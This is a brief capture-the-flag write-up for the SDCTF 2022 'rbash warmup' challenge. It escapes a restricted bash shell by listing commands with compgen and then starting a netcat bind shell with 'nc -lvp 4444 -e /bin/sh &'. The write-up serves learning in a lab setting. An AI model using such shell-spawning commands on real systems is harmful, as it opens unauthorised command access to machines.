Sdctf 2022

rbash warmup

Solved By : thewhiteh4t

we can use compgen to check for available commands

compgen -c

another way is to use echo

now the known way of escaping with nc is by getting a shell on our “attacker” box but in this challenge we are not allowed to connect to remote machines so we are left with localhost

actually this is more easy…

nc -lvp 4444 -e /bin/sh &

now we can connect to it !